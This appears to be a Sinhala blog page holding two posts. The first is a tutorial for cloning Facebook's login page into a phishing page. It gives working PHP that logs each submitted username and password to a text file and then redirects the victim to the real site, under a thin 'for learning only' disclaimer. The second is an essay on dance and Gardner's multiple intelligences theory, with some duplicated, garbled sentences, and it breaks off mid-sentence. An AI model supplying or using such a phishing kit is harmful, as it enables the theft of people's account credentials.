Facebook password hack කරන්න Fb Phishing Page එකක් හදමු

on Saturday, 29 December 2012
මේ කියන්න් යන්නේ වෙනදට වඩා ටිකක් විතර වෙනස් දෙයක්. සේරටම කලින් කියන්න කැමතියි මම මේ දේවල් කියල දෙන්නෙ ඉගන ගනන් කැමති අයට. මම කියන දෙයින් අයුතු දේ කරනන ගිහින් අමාරැවෙ වැටෙන්න නම් එපා ok. එහෙනම් පටන් ගමු.
මම අද කියල දෙන්නෙ ලෝකෙ වටේට ඉන්න් hackers ලා face book, gmail, hotmail & website hack කරන ක්‍රම 5ක් 
බලමු මොනවද ඒ ක්‍රම 5 කියල

           1.Social Engineering
                   2.Keylogging
                   3.Reverting Password / Password Recovery Through Primary Email
                   4.Facebook Phishing Page/ Softwares
                   5.Stealers /RATS/Trojans

අද කියන්න යන්නෙ ලේසිම ක්‍රමය Phishing Page හරි මේකට මම උදාහරනයක් විදියට මූනු පොත ගන්නන්
පලවෙනි එක මේකට අපිට file 3 ක් ඕන

1. index.htm
2. login.php
3.login.text

හරි පලවෙනි කාරනේ පටන් ගන්න කොටම කිව්ව වගේ මෙක කාටවත්  රිදවන්න වත් අනුන්ගෙ privet life නැති කරන්නවත් කරන්න යනවනම් ඔයාට බලපාන කිසිම ප්‍රශ්නෙකට මම වග කියන්නෙ නෑ මම මේක කියල දෙන්නෙ ඉගන ගන්න විතරයි 

හරි බලමු කොහොමද index.htm එක හදන්නෙ කියල





2. හරි දැන් ඒ login page එක උඩ right click කරල save as කරන්න ඒක desktop එකේ folder එකක් හදල 
     නම index කියල දාල save කරන්න මතක තියා ගන්න මේ නම විතරක් පාවිච්චි කරන්න

3.  ok දැන් ඒ save කර ගත්ත   index  file එක note pad හෝ  edit plus ඔයා කැමති text editor එකකින් open කරන්න දැන් "post"  කියන වචනෙ search කරන්න  post කියල වචන ගොඩක් තියනව 

"login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" 

මෙන්න මේ post එක තියන තැන හොයා ගන්න ඒක "GET" කියල වෙනස් කරන්න දැන් save කරන්න

4. හරි දැන් උඩ තියන පේලියෙම 

"login_form" action="https://www.facebook.com/login.php?login_attempt=1"

මේ පේලිය පහත විදියට වෙනස් කරන්න

"login_form" action="login.php" 

හරි දැන් index.htm ok save කරන්න



දැන් බලමු කොහොමද login.php එක හදන්නෙ කියල


1.මේක ටිකක් html නො දන්න අයට හදන්න සංකීර්ණ වැඩි නිසා මම හදපු path එක දෙන්න තීරනය කරා 
OK ඉස්සර වෙලාම note pad  open කරල පල්ලෙ මම දීල තියන path එක ඒ විදියටම copy කරල paste කර ගන්න 

<?php

header("Location: http://www.facebook.com");

$handle = fopen("login.txt", "a");

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?> 


දැන් මේ file එකත් desktop එකේ folder එකට login.php කියල save කරගන්න. අමතක නොකර save කරන කොට all file විදියට save කරන්න
 ok දැන් login.php එකත් ඉවරයි


දැන් ගොඩක් දුරට ඉවරයි  ඊලගට login. text  file එක 

ඔයාගෙ desktop එකේ ඔයා file save කරපු folder එක open කරල ඒකෙ new text file එකක් හදල ඒක 
login.txt  කියල save කරන්න  


හරි දැන් ඔයාගෙ  Facebook Phishing Page එක හදල ඉවරයි


මේක website එකකට දාල hack කරන හැටි ලගදීම බලා පොරොත්තු වන්න


(සැ.යු - මෙම ක්‍රමය පැරනි ක්‍රමයකි. දැන් බොහෝ දෙනා Phishing Page ගැන සැලකිලැ මත් වේ නමුත්  මා මෙය ඔබගේ දැනුම සදහා ලියමි.) 



ගුණ දොස් ඇතොත් comment කරන්න අමතක කරන්න එපා


(2 කොටසින් හමු වෙමු)










නර්තනයේ බහුවිධි බුද්ධි න්‍යාය

on Monday, 24 December 2012


නර්තනයේ වනාහි යම්කිසි අර්ථයක්‌ ප්‍රකාශ වන පරිදි හෝ නොවන පරිදි තාලානුකූලව හෝ තාලානුකුල නොවන පරිදි ශරීරයේ අංග, ප්‍රත්‍යාංග සහ උපාංග චලනය කරමින් රූප හැඩතල සමූහයක්‌ නිරූපණය කිරීමකි. නර්තනය මෙලෙස ඉතා කෙටියෙන් අරුත් ගැන්වූවද ඒඑක්‌ වදනක්‌ පාසා දිගු වශයෙන් සාකච්ඡා කළ හැකි කරුණු බොහොමයක්‌ නර්තනය යන ක්‍රියාදාමයෙහි අන්තර්ගත වේ. එනම් යම්කිසි වස්‌තුවක්‌ හෝ පුද්ගලයකු ගේ අවස්‌ථාවක්‌ හෝ සිදුවීමක්‌ හෝ තේමා කොටගෙන හිස, කඳ, අත් පා ආදී අංගත් ඇස්‌ සහ වැළමිට ආදී ප්‍රත්‍යාංගත් ඇහිබැමි සහ ඇගිලි උපාංගත් භාවිත කොට අභිනයෙන් ඒ තුළින් රූප හැඩතල රටා නිර්මාණය කෙරෙමින් කරන්නාවූ රිද්මයානුකූල වන හෝ නොවන අදහස්‌ ප්‍රකාශ කිරීම බොහෝ විට නර්තනයේ පොදු ලක්‌ෂණය වේ.

සාමූහික සජීවී ප්‍රාසාංගික කලා මාධ්‍යයක්‌වන නර්තනය ඉදිරිපත් කිරීමේදී නර්තකයා කේෂාන්තයේ සිට පාදාන්තය දක්‌වාම සියලු අංග ප්‍රත්‍යාංග සහ උපාංග උපයෝගී කර ගන්නා හෙයින් නර්තනයේ ප්‍රධානතම මාධ්‍යය ලෙස කායික චලනය හඳුන්වාදිය හැකිය. තවද මීට අමතරව නර්තකයාගේ භාවභාව පැම. අංගහාර පැම. සාත්වික අභිනයෙන් කෙරෙන භාව ප්‍රකාශනය හා ආභාර්ය අභිනය තුළින්ද ඒ ඒ නර්තනයේ ඇති ගුණාත්මක බව වැඩි දියුණු වේ. එහෙත් බොහෝ විද්වතුන්ගේ මතය අනුව නර්තනය හුදු පුහුණු වීමක්‌ පමණක්‌ නොව එය ප්‍රගුණ කල යුත්තකි. එනම් ඉගෙනගැනීම තුළින් නිසි ලෙස ප්‍රගුණ කොට දියුණු කරගත යුත්තකි. මෙය තවත් පැහැදිලි කළහොත් නර්තනය ප්‍රගුණ කළ තැනැත්තා තුළ ජීව ගුණ කුසලතාව ඇති අතර එය පවත්වාගෙන යැමට මනා පුහුණුවක්‌ අත්‍යවශ්‍යය.

නර්තනය යනු බුද්ධිමය විෂයක්‌ හෙවත් මනෝචාලක ක්‍රියාකාරිත්වයක්‌ ඇති ක්‍රියාවක්‌ ලෙසද අරුත් ගැන්විය හැකිය. "බි.එස්‌. බ්ලුම්" මහතා විග්‍රහ කොට ඇති පරිදි නර්තනයේදී ශාරීරික සහ මානසික කුසලතා අතර බැඳිමක්‌ මෙන්ම සමබරතාවද තිබිය යුතුය. ඒ අනුව නර්තනයාට ශාරීරික වශයෙන් ප්‍රගුණ කිරීම සහ පුහුණුවත් බුද්ධිමය වශයෙන් සමෘතිය, සංජානකය සහ නිර්මාණි බවත් තිබිය යුතු බව කිව හැකිය.මේ සඳහා හොඳම උදාහරණය ශ්‍රී ලාංකේය නර්තන සම්ප්‍රදායක එන "අවදානම් කලාව" මගින් වටහාගත හැකිය. එහි එක්‌ ක්‍රමයකට නිදසුන් දැක්‌වූවහොත්, බෙරකරුවා බෙරය වයමින්ම කවි ගායනා කළ යුතුවන අතර තම පාදයේ ඇඟිල්ලෙන් චිත්‍රයක්‌ද ඇදිය යුතුය. එවිට පිටතින් සිටින කෙනකු ඔහු වෙතට කුඩා ගල් කැබිලිති ගසන අතර බෙරකරුවා ඒවාද ගණන් කළ යුතුය. මෙවන් අවදානම් සතක්‌ මෙහිදී ප්‍රගුණ කළ යුතු වෙයි. ඒ අනුව බලන කල්හි මෙම අවදානම් කලාව තුළින් අපේක්‌ෂා කෙරෙන්නේ කෙරෙන්නේ නර්තනයට මනා පුහුණුවක්‌ ලබාදීමත් මානසික එකාග්‍රාව රදා පවත්වාගැනීමට හුරු කරවීමත් බව පැහැදිලිය.

මේ අනුව නර්තනය වනාහි ශාරීරික වශයෙන් පෞරුෂය වර්ධනය කිරීමක්‌ නොව මානසික වශයෙන් බුද්ධිය ප්‍රගුණ කරවන්නක්‌ බව දැක්‌විය හැකිය. ඒ අනුව 1984 දී "හෝවාර්ඩ් ගාඩ්නර්" නම් අමරිකානු මනෝවිද්‍යාඥයා ඉදිරිපත් කළ "බහුවිධ බුද්ධි න්‍යාය" යන සංකල්පය තුළින් මිනිසා තුළ පවතින බුද්ධි වර්ග අටක්‌ පිළිබඳ අදහස්‌ දක්‌වන අතර එහි සියල්ලම පාහේ නර්තනය හා සම්බන්ධ කොටගැනීමෙන් නර්තනයෙහි ඇති බුද්ධිමය ක්‍රියාදාමය පිළිබඳ කරුණු තහවුරු කළ හැකිය. මොහු දක්‌වන ලද න්‍යායේ එන බුද්ධි ප්‍රභේද නම්.

1. වාචසික සහ භාෂාමය බුද්ධිය

2. සංගීත රිද්මයානුකූල බුද්ධිය

3. තර්කන බුද්ධිය

4. දෘශ්‍ය සංචලනමය බුද්ධිය

5. අන්තර් පුද්ගල බුද්ධිය

6. ආත්මාවබෝධය පිsළිබඳ බුද්ධිය

7. සොබාදහම් බුද්ධිය වේ.

ඉතා සැකෙවින් කිවහොත් යථෝක්‌ත සියලු ප්‍රභේදයන් තුළින් නර්තනයේ බුද්ධිමය දායකත්වය පිළිබඳ විස්‌තර කෙරේ. තවද හෝවාර්ඩිගේ න්‍යාය තුළ නර්තනය වියුක්‌ත බුද්ධියක්‌ ලෙස දැක්‌වීමද ඉතා වැදගත්ය. ඒ අනුව නර්තනයේදී ඉහත බුද්ධිය ප්‍රභේදයන් උපයෝගී කොට ගැනෙන අයුරු මෙයින් මතු සාකච්ඡාවට ලක්‌ කෙරෙයි.

ඒ අනුව ඉහත බුද්ධි ප්‍රභේදයන් අතුරෙන් නර්තනයේදී මූලිකවම වැදගත් වන්නේ කායික සංචලනමය බුද්ධියය. විශේෂයෙන්ම නර්තකයා හට සුඛනම්‍ය ලෙස හැසිරවිය හැකි හැකි සිරුරක්‌ තිබිය යුතුය. මෙහිදී නර්තකයා තමා ඉදිරිපත් කරන නර්තන ශෛලිය පිළිබඳ මනා අවබෝධයකින් සිටීම කායික සංචලනමය බුද්ධිය ලෙස සඳහන් කල හැකිය. විශේෂයෙන්ම නර්තකයා ඒ ඒ ශෛලියට අනුව තම කායික සංචලනය වෙනස්‌ කළ යුතු ආකාරය පිළිබඳ වැටහීම් නර්තනයේදී බොහෝ වැදගත්ය. එමෙන්ම එක්‌ එක්‌ ශෛලීන්ට අනුගතව තම ශරීරය හැසිරවීමත් ආහාර යනාදියත් පිළිබඳව මනා පුහුණුවක්‌ හා අවබෝධයක්‌ ලබා තිබිය යුතුය. එහිදි විවිsධ රිද්මයන්ට අනුකූලව භාණ්‌ඩ සහ ලාස්‍ය ස්‌වරූපයන්ද ඉදිරිපත් කිරීමේදී නර්තකයා කායික සංචලන බුද්ධිය හොඳින් ලබා තිබිය යුතුය. උදාහරණ ලෙස කථකලි නර්තනකයකු දෛනකිව අවුරුදු දොළසක්‌ පුරා ගුරුවරයා සමග අභ්‍යාසයේ යෙදීමෙන් අක්‌ෂි චලන කායික ව්‍යායාම්, සම්භාහනය සහ හස්‌ත ප්‍රභේද (මුද්‍රd) යන ත්‍රිවිඩ අංගයන්ගේ නිපුණත්වය ලබා සිටිය යුතුය. එමෙන්ම කථක්‌ නර්තනයේදී මුළුමනින්ම පාහේ පාද චලනය බෙහෙවින් උපයෝගී වන හෙයින් කථක්‌ නර්තකයාඑහි නිපුණත්වය ලබාගැනීමට ඒ වෙනුවෙන් දැඩි කැපවීමක්‌ කළ යුතුය. තවද සංසන්දනාත්මකව බලන කල්හි ශ්‍රී ලාංකේය උඩරට, පහතරට සහ සබරගමු යන ත්‍රිවිඩ සම්ප්‍රදායන්හි කැරකීමේ සංචලනය ඉන්දියානු කථක්‌ ශ්‍රී ලාංකේය උඩරට, පහතරට සහ සබරගමු යන ත්‍රිවිඩ සම්ප්‍රදායන්හි කැරකීමේ සංචලනය ඉන්දියානු කථක්‌a නර්තනයේ පාරෙන් නම් කැරකෙන විලාසයත් එකිනෙකට වෙනස්‌ය. එහෙයින් මෙලෙස යම් නර්තන ශිල්පියකු සාම්ප්‍රදායික නර්තනයක්‌ ප්‍රතිනිර්මාණය කිරීමේදී සහ තව නර්තන නිර්මාණ කරන විට කායික සංචලන බුද්ධිය ඉවහල් කරගත යුතුය.

වාචසික සහ භාෂාමය බුද්ධිය ද නර්තනයට බෙහෙවින් අදාළ වන්නාවූ බුද්ධි ප්‍රභේදයකි. නර්තනයේදී මෙම බුද්ධි ප්‍රභේදය උපයෝගී වන්නේ නර්තනය නාෙට්‍යාaචිත අවස්‌ථාවන් හා සම්බන්ධ වීමෙහිදීය. එනම් ගායනා සහ දෙබස්‌ ආදිය අදාළ කරගැනීමෙහිදී මෙම බුද්ධි ප්‍රභේදය බොහෝ වැදගත් වෙයි. මේ සඳහා බොහෝ දුරට ශ්‍රී ලාංකේය නර්තන සම්ප්‍රදායන්වල මුල් පදනමවූ ශාන්තිකර්ම වලින් නිදසුන් ගතහැකිය. සබරගමු සම්ප්‍රදායේ එන කුමාර සමයම යාගය එවැන්නකි. දරුගැබක්‌ අපේක්‌ෂා කරන කාන්තාවන් වෙනුවෙන් ගර්භණී මාතාවන්, වෙනුවෙන් දරුවකු සහ මවක වෙනුවෙන් යනාදී වශයෙන් සෙත් ශාන්තිය පිණිස මෙම යාගය සිදු කෙරෙයි. මෙහි කුමාර පෙළපාලිය යනු එම ශාන්ති කර්මයේ අන්තර්ගත නාට්‍යමය අවස්‌ථාවන්ය. එහිදී අර්ථෝත්පාදනයට යෙදෙන දෙබස්‌ හා කවි ගායනා වටහාගැනීමට සහ එම දෙබස්‌ සහ කවි ස්‌ථානෝචිත භාවිත කිරීමට ඉහත කී වාචසිත සහ භාෂාමය බුද්ධිය ඉවහල් වෙයි. මීට අමතරව විවිධ ශාන්තිකර්මවල හමුවන කවිවලට නිදසුන් දැක්‌වූවහොත්,

දේව ආරාධනා කවි

සිව්වරම් දෙවියන් - මෙරඟ මඬලට සැණෙකින්

දිවැස්‌ලා බලමින් - රකින ආතුර අදර බැතියෙන්

යක්‌ෂයින් කැඳවීමේ කවි

කණ්‌ඩ හදවත් ලේ මස්‌ උරිරු විකා

එණ්‌ඩ සැරසෙමින් පොළඟකු කටින් විකා

ගන්ඩ නයින් ගලක්‌ බැද වටත රෙකා

එන්ඩ පිටත් වුණි තෙද සූනියම් යකා

යථෝක්‌ත ඉදිරිපත් කළත් වැනි නිදර්ශන කවි දෙස සන්සන්දනාත්මකව අවධානය යොමු කළහොත් දෙවියන් යනු මිනිසුන් විසින් උතුම් ලෙස සලකනු ලබන පුද්ගල කොටසක්‌ වන හෙයින් දේව ආරාධනා කවියෙහිදී ඉතා සුමට වදන් යොදාගනු ලැබෙයි. ඉතා යටහත් පහත්ව එම ආරාධනාව කෙරේ. නමුත් යක්‌ෂයින් කැඳවීමට යොදාගත ඇති භාෂාව බිය ජනක ගැඟීම් ජනිත කරවන වාග්මාලාවක්‌ යොදාගෙන ඇත. එමෙන්ම යක්‌ෂයාට කෙරෙන්නාවූ ආරාධනාවද යටහත් පහත් නොවී යක්‌ෂයා පහත් ලෙස සලකා කෙරෙන ආමන්ත්‍රණයක්‌ බව දැකිය හැකිය. මෙම සියලු දේ දෙස බලන කල්හි යම් නර්තනමය අවස්‌ථාවක අර්ථ උද්දීපනයෙහිලා භාෂාමය බුද්ධිය ඉවහල් වන බව පැහැදිලිය. විශේෂයෙන්ම යම් යම් අවස්‌ථාවලදී එම මොහොතේදීම ශාන්තිකර්මකරුවා නොහොත් යකැදුරාම කවි සහ දෙබස්‌ නිර්මාණය කරනහෙයින් අදාළ ශාන්තිකර්මයට උචිතව විදත් භාවිතයේදී වාචසිත සහ භාෂාමය බුද්ධිය අත්‍යවශ්‍යය.

ලොව පවත්නා සෑම නර්තන සම්ප්‍රදායකටම පාහෝ සංගීතයේ සහයෝගය ද ලැබේ. ගායනයක්‌ සහ වාදනයක්‌ නර්තනයේ අර්ථය සහ රසය තවත් තිවීර කොට දැක්‌වීමෙහිලා අත්‍යවශ්‍යය. ඒ අනුව සංගීත සහ රිද්මයානුකූල බුද්ධිය නර්තනයේදී වැදගත් වන බව පෙනේ. විශේෂයෙන්ම යම් නර්තනයයකට තේමා කොටගන්නා ජීවී හෝ අජීවී වස්‌තුව ප්‍රතිනිර්මාණයේදී ඒ ඒ වස්‌තුවට ගැලපෙන ස්‌වාභාවය නිරූපණය කරන සංගීතයක්‌ සහ රිද්මයක්‌ යොදාගැනීම වැදගත්ය. නිදසුන් වශයෙන් රුසියානු ඇනා පැවලීනාගේ "හංස විල" බැලේ නර්තනයට යොදාගෙන ඇති සංගීතය දැක්‌විය හැකිය. එහි සංගීතය සහ රිද්මය එම බැලේහි ප්‍රතිනිර්මිත හංස වලන රටාවන්ට ඉතා හොඳින් ගැලපේ. එමෙන්ම නර්තනයේදී අභිනයෙන් දක්‌වන සිද්ධින්වල හෝ චරිතවල ලක්‌ෂණ වඩාත් ඉස්‌මතු කොට දැක්‌වීමටද සංගීතය යොදාගැනේ. කථකලි නර්තන සම්ප්‍රදායේ වාදනය වන "චෙණ්‌ඩා" නම් වාද්‍ය භාණ්‌ඩය ස්‌ත්‍රී සහ රාක්‌ෂ චරිතවල ලක්‌ෂණ ඉස්‌මතු කිරීමටත් කලබල ගතිය සහ වර්ෂාව ආදිය දැක්‌වීමට වෙණ්‌ඩා සහ මද්දල යන දෙවර්ගයම වාදනය කිරීමත් එවැනි අරුත් තීවිර කරන අවස්‌ථාවන් වෙයි. එපමණක්‌ නොව එක්‌ එක්‌ නර්තන සම්ප්‍රදායන්ට ආවේණිකව යොදාගැනෙන සංගීත රටා සහ වාද්‍ය භාණ්‌ඩ පිsළිබඳවද හොඳ අවබෝධයක්‌ නර්තන සම්ප්‍රදායන්ට ආවේණිකව යොදාගැනෙන සංගීත රටා සහ වාද්‍ය භාණ්‌ඩ පිළිබඳවද හොඳ අවබෝධයක්‌ නර්තන ශිල්පීන් සතුව තිබිය යුතුය. නිදසුන් ලෙස ශ්‍රී ලාංකේය නර්තන සම්ප්‍රදායන්හි තාලය සමබරව තබාගැනීමට ගැටබෙරය, පහතරට බෙරය සහ උඩැක්‌කි ආදී අවනද්ධ වාද්‍ය භාණ්‌ඩ භාවිත කෙරෙයි. එමෙන්ම කථකලි නර්තන ශෛලියේදී කර්ණාටක සංගීතය උපයෝගී කරගැනීමත් කථක්‌ නර්තන ශෛලියේදී හින්දුස්‌ථාන් සංගීතය උපයෝගී කොට ගැනීමත් මීට නිදසුන් වෙයි. තවද එක්‌ එක්‌ නර්තන සම්ප්‍රදායෙන් සම්ප්‍රදායට සිදුකරන කවි ගායනයන්ද එකිනෙකට වෙනස්‌වන අතර කවි මගින් අර්ථ උද්දීපනය කරන අතර ශ්‍රව්‍යමය රසයක්‌ද ලැබෙයි. නිදසුන් ලෙස වන්නම් ශාන්තිකර්ම සහ ගැමි නැටුම් ආදියෙහි පවතින සංගීත විෂමතාවන් දැක්‌විය හැකිය. එමෙන්ම කථකලී නර්තනයා අභිනයෙන් ගීතයේ අදහස විස්‌තර කරන බැවින් පසුබිම් ගායකයාද රාග ලක්‌ෂණ ඔස්‌සේ නර්තනයට සමගාමීව එහි රස භාව උද්දීපනය කළ යුතුය. තවද කථක්‌ නර්තනයේ පාද චලනයේදී තිබිලා පද අනුව රිද්මයත් තාලානුකූලව රචිත කාව්‍යමය නිබන්ධන හෙවත් කවිතා මගින් හස්‌ත මුද්‍රdවල අදහස්‌ ඉදිරිපත් කෙරේ. මෙහිදී ගායනයේ නිවැරැදි උච්චාරණය හඬ වෙනස්‌ කිරීම ආදිය නර්තනයේ වලිතයට ඉතා වැදගත් කොට සැලකේ. එහෙයින් ඒ ඒ ශෛලියට යෝග්‍ය වන පරිදි සංගීතය උපයෝගී කොටගැනීමට නම් නර්තන ශිල්පියකුට සංගීත රිද්මයානුකූල බුද්ධිය නර්තනයක්‌ නිර්මාණයේදී අවශ්‍ය බවට සැකයක්‌ නොමැත.

මිනිස්‌ මොළයේ වම් මස්‌තිෂ්කයට සම්බන්ධ තාර්කික බුද්ධිය දකුණු මස්‌තිෂ්කයට සම්බන්ධ වන කලා විෂයන් අතුරෙන් නර්තනය හා සම්බන්ධ වීම ඉතා වැදගත් වේ. නර්තනය හා සබැදි තාල සහ කවි ආදිය ප්‍රස්‌ථාර කරණයේදී හට කී තාර්කික බුද්ධිය නර්තනයට බලපායි. සෘජුවම තාර්කිකත්වයම සම්බන්ධ නොවූවද ඒ හා සම්බන්ධ ගණිතමය සංකල්ප නර්තනයේදී උපයෝගී කොටගැනේ. කෙසේ වුවද ප්‍රස්‌ථාරයක්‌ ලිතව තබාගැනීමෙහිදී තාර්කික බුද්ධිය උපයෝගී කොටගෙන යුතුවේ. මෙහිදී ශ්‍රී ලාංකේය නර්තන සම්ප්‍රදායේ තිත් ක්‍රමය නිදසුන් වශයෙන් දැක්‌විය හැකිය. සුළු මැදුම් සහ මග යන ප්‍රධාන තිත් ක්‍රම තුන තනි තනිව හෝ කිහිපයක්‌ එකතු කිරීමෙන් රිද්මය සහ තාලය හොඳින් සමබරව පවත්වාගැනීම සාමාන්‍ය ක්‍රමය වෙයි. මෙහිදී තාර්කික හෙවත් ගණිතමය බුද්ධිය පිළිබඳ අවබෝධයක්‌ තිබිය යුතුය. එයට හේතුව වන්නේ ගායනය වන අයුරින්ම ප්‍රස්‌ථාරකරණයට පරිවර්ථනය කිරීමේදී බැඳි අක්‌ෂර සහ ඇදෙන අක්‌ෂර පිළිබඳ මෙන්ම එවා යෙදිය යුතු අයුරු තාර්කික බුද්ධිය සහ ගණිතමය බුද්ධිය අනුව සිදුකළ යුතුය. එපමණක්‌ නොව වේදිකා භාවිතයේදී උපයෝගී කොට ගන්නා වෘත්තාකාර සහ ඉලිප්සාකාර ආදී හැඩද නර්තනයේදී අත් පා සහ සිරුර තබාගන්නා හැඩද ගණිතමය ජ්‍යාමිතික රූප හැඩතලවලට සමානකමක්‌ දක්‌වයි. උදාහරණ ලෙස දැක්‌වුවහොත් බැලේ නර්තනවලදී විශාල රංග පිරිසක්‌ දායකවීමෙන් විවිධ රටා එනම් ගණිතමය රූප සහ හැඩතල සාදයි. ඒ සියලු දෙනාගේ චරිත තුළින් භාව ප්‍රකාශනය සිදු කෙරේ. ඒ අනුව නර්තනයට තාර්කික බුද්ධිය සහ ගණිතමය සංකල්පද අඩු වැඩි වශයෙන් යොදාගැනෙන බවපෙනේ .

තවදුරටත් බැලීමේදී නර්තනය තුළ දෘශ්‍ය අවකාශමය බුද්ධියද ඉතා වැදගත් වේ. මෙයට හේතුව වන්නේ මෙම බුද්ධි ප්‍රභේදය නර්තනය තුළදී ප්‍රේක්‌ෂකයාගේ අවධානය දිනාගැනීමෙහිලා ඉවහල් වන හෙයින්ය. කෙසේ වූවද අවකාශ උපයෝගී කරගනිමින් සාත්වික අභිනය ඇසුරෙන් ඉදිරිපත් කෙරෙන රසභාව භාව ප්‍රකාශන සහ හස්‌ත මුද්‍රdත් ආහාර්ය අභිනයත් මෙහිලා ඉතා වැදගත්ය. කථකලි නර්තන සම්ප්‍රදාය නිදසුන් ලෙස දැක්‌වුවහොත් එහි අභිනය විශේෂ තිස්‌ හතරක්‌ද හස්‌ත මුද්‍රdවන්ගේ වර්ණමාලා පන්සියයක්‌ද වේ. එහි ඇති භාව ප්‍රකාශන ඇඳුම් සහ වේශ නිරූපණයදඊටම ආවේණික වූ ඒවාය. එමෙන්ම සාම්ප්‍රදායික කථකලි වේදිකාව සැකසෙන්නේ පොළවට සමාන්තරව අඩි දොළසක්‌ පමණ දිගකින්ය. එය ඉදිරියෙන් ඇතිවිශාල පොල්තෙල් පහනින් ආලෝකය ලැබෙයි. ප්‍රේක්‌ෂකාගාරය ඇති පෙදෙස අඳුරුය. ඒ අනුව කථකලි නර්තන හිල්පීයා තම නර්තන ඉදිරිපත් කල යුත්තේ තමාගේ අවට අවකාශ පිළිබඳ මනා අවබෝධයකින් යුතුවය. එසේ නොවුණහොත් ඔහුට නිසි පරිදි රංගනය ඉදිරිපත් කළ නොහැකිය. එමෙන්ම මෙහිදී දෘශ්‍යමය වශයෙන් විද්‍යාමාන වන ආභාර්ය අභිනය ගතහොත් ඇඳුම් පැළඳුම් වැනි වේශ නිරූපණයට සම්බන්ධ දේ පිළිබඳ අවබෝධයද මෙම බුද්ධි ප්‍රභේදයෙහිලා ගැනේ. මක්‌ නිසාද යත් නර්තනය දෘශ්‍ය මාධ්‍යයක්‌ න නිසාය. නිදසුන් ලෙස භරත නාට්‍ය සඳහා යොදාගන්නා ඇඳුම් කට්‌ටල සහ ශ්‍රී ලාංකේය උඩරට පහතරට සහ සබරගමු යන නර්තන සම්ප්‍රදායන්වල නර්තනයන්ට ආවේණික ඇඳුම් පැළඳුම් කට්‌ටල ආදිය දැක්‌විය හැකිය. විශේෂයෙන්ම උඩරට වෙස්‌ ඇඳුම් කට්‌ටලය දෘශ්‍යමය වශයෙන් ඉතා ආකර්ෂණීය වෙයි. එමෙන්ම විවිධ නර්තන සම්ප්‍රදායන්වලදී යොදාගැනෙන ඇඳුම්වල වර්ණයන්ද නිතැනින්ම ඇස ආකර්ෂණය කරන පැහැයක්‌ වෙයි. නිදසුන් ලෙස කොළ රතු, සුදු, රිදී, රන්, කහ ආදී ක්‍ෂණිකව ග්‍රහණය වන පැහැයන් යොදාගැනීමෙන් ප්‍රෙක්‌ෂකයාගේ ඇස පිනවීම අරමුණ කර ගැනේ.මෙම බුද්ධි ප්‍රභේදය යොදා ගැනෙන තවත් අංශයක්‌ වන්නේ ආලෝකකරණයයි. ප්‍රේක්‌ෂකාගාරයේ සිටින ප්‍රේක්‌ෂයාට නර්තනය සියලු පැතිවලින්ම හොඳින් දැකබලා ගත හැකි වන අයුරින් ආලෝකකරණය හැසිරවීම කළ යුතුය. නර්තනයේ එක්‌ එක්‌ සුවිශේෂී අවස්‌ථාවන් ඉස්‌මතු වන පරිදි මෙන්ම රංගනයේ යෙදෙන පිරිසේ චලිතයේ වපසරිය අනුව ආලෝකකරණය භාවිතයට ගත යුතුය.ඒ අනුව අතීතයේ කථකලි වේදිකාව ඉදිරියේ පොල්තෙල් පහන දැල්වූයේ තත්කාලයේ ආලෝකය වේදිකාව මතට ගැනීමට තිබූ උචිතම ක්‍රමය එයවූ නිසා විය යුතුය. එසේ වූවද වර්තමානය වනවිට තාක්‌ෂණයේ දියුණුවත් සමගම විවිධ වර්ණයන්ගෙන් යුත් අලෝකකරණය ක්‍රමවේද පවතින හෙයින් ඒ ඒ නර්තනයට ගැලපෙන පරිදි ආලෝකකරණයද යොදාගත යුතුය. ඒ අනුව මෙම බුද්ධි ප්‍රභේදය හරහා ප්‍රෙක්‌ෂකයාත් නර්තකයාත් මෙන්ම නර්තනයත් අතර මනා සහසබඳතාවක්‌ ගොඩනගා ගැනීමට හැකියාව ලැබෙන හෙයින් නර්තන ශිල්පියකු සතුව මෙම බුද්ධි ප්‍රභේදයද තිබිය යුතුය.

ඉහත අවස්‌ථාවක දැක්‌වූ පරිදි නර්තනය වනාහි සාමූහික කලා මාධ්‍යයකි. ඒ නර්තනයේදී නර්තකයා, ගායකයා, වාදකයා සහ ප්‍රේක්‌ෂකයා යන චතුර්විධ අංශ සහභාගි වන හෙයිනි. එබැවින් අන්තර පුද්ගල බුද්ධිය එකිනෙකා අතර රදා පවත්වාගැනීම අත්‍යවශ්‍ය වෙයි. උඩරට නර්තන සම්ප්‍රදායේ එන මුසලඩ් වන්නමෙහි මුල් කොටසේදී භාවාගේ සුන්සුන් ගමන් විලාසයත් ඉන් අනතුරුව භාවාගේ වේගවත්ව පනිමින් යන ගමන් විලාසයත් දැක්‌වීමේදී නර්තනය ගායනය සහ වාදනය යන ත්‍රිත්වයේ මනා සුසංයෝගය අතිශය වැදගත් වේ. එසේ නොවුණහොත් එය අර්ථයක්‌ රහිත නිර්මාණයක්‌ වෙයි. එමෙන්ම දකුණු ඉන්දියානු නර්තන ශෛලියක්‌වූ කථකලි නර්තනයද තවත් නිදසුනකි. මෙම නර්තනයේදී ගීතයේ පද නිතර නිතර ගැයෙන්නේ නර්තකයා වචනයෙන් වචනයට අභිනයෙන් අරුත් සපයන නිසාය. මෙහිදීද අන්තර් පුද්ගල බුද්ධියක්‌ තිබිය යුතු වීම නර්තනයේ අදහස්‌ ප්‍රකාශයට බොහෝ වැදගත්ය. තවද කථක්‌ නර්තනයේදී ද ගායනාව සිදු කරන්නේ නටන පද අත්හල අනුවය. එහෙයින් නර්තකයා හෝ ගායකයා හෝ වාදකයා තමාට රිසි ලෙස නර්තනයේදී යෙදීම හෝ ගායනය කිරීම හෝ වාදනය කිරීම හෝ කළහොත් එමගින් ප්‍රේක්‌ෂකයාගෙන් අයහපත් ප්‍රතිචාර ලැබෙන අතර නර්තන කෘත්‍ය මුළුමනින්ම පාහේ විනාශ වී යනු ඇත. එපමණක්‌ නොව මෙම තුන්විධ පිරිස ඉතා උසස්‌ ලෙස තම නර්තන නිර්මාණය ඉදිරිපත් කළද ප්‍රේක්‌ෂකයා සහ සමස්‌ත නර්තනයේ යෙදෙන පිරිස අතරද හොඳ අන්තර් පුද්ගල සබඳතාවක්‌ තිබිය යුතුය. ප්‍රේක්‌ෂකයා සහ නර්තන ශිල්පීන් සහ නර්තනය අතර පුද්ගල සබ¹තාව හොඳින් පවත්වාගෙන යැමට නර්තකයා ගායකයා සහ වාදකයා අතර අන්තර් පුද්ගල සබඳතාවද හොඳින් පවත්වාගත 